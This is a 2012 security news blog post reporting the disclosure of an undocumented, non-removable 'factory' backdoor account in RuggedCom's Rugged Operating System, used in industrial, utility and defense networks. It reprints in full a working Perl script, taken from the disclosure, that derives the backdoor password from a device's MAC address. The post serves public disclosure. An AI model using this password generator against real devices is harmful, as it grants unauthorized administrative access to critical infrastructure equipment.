Your security, networking, programming, and application news source.

Tuesday, April 24, 2012

RuggedCom Unresponsive, Rugged Operating System (ROS®) Backdoor Disclosed

A factory backdoor account in RuggedCom's Rugged Operating System (ROS®) has been disclosed. <RuggedCom> is a manufacturer of rugged networking equipment popular in industrial, utility, and defense industries. These sensitive consumers of frequently security sensitive networking devices have recently been informed by RuggedCom, who has acknowledged the backdoor. Due somewhat to RuggedCom's unresponsiveness after acknowledgement, this information was publicly disclosed. According to the disclosure, an undocumented account, "factory", which cannot be disabled, is included in all released versions of ROS® with a password generated from the device's MAC address.

<Secunia - Full Disclosure CVE-2012-1803 (April 23, 2012)>

if (! defined $ARGV[0]) {
print "+========================================== \n";
print "+ RuggedCom ROS Backdoor Password Generator \n";
print "+ JC CREW April 23 2012 \n";
print "+ Usage:\n$0 macaddress \n";
print "+========================================== \n";
exit; }
$a = $ARGV[0];
$a =~  s/[^A-F0-9]+//simg;
@b = reverse split /(\S{2})/,$a;
$c = join "", @b;
$c .= "0000";
$d = hex($c) % 999999929;
print "$d\n";

No comments:

Post a Comment